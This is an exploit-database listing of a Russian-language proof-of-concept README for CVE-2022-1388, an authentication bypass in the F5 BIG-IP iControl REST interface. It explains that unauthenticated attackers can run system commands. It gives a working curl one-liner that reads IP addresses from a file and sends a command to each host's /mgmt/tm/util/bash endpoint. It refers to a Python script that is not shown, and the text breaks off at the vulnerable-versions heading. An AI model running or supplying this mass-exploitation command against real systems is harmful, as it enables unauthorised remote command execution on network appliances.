Sploitus

Exploit for CVE-2022-1388

kitploit · 2026-09-04

Exploit Code

MARKDOWN18 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SHAMO0-CVE-2022-1388
# PoC для уязвимости BIG-IP iControl REST CVE-2022-1388

![f5logo](https://assets.kitploit.com/production/public/readmes/32281/6c1abeefefc0dc446b8808c1b8286b7d4a2c41b3ae30825116e9e03febaa9451.jpg)

Эта уязвимость может позволить неаутентифицированному злоумышленнику, имеющему сетевой доступ к системе BIG-IP через порт управления и/или self IP-адреса, выполнять произвольные системные команды, создавать или удалять файлы, либо отключать сервисы.

## PoC

Вы можете использовать следующую однострочную команду curl для проверки уязвимости F5 Big-IP или воспользоваться предоставленным Python-скриптом.

root@kitploit:~
    
    
    cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
    

## Уязвимые версии (Big-IP)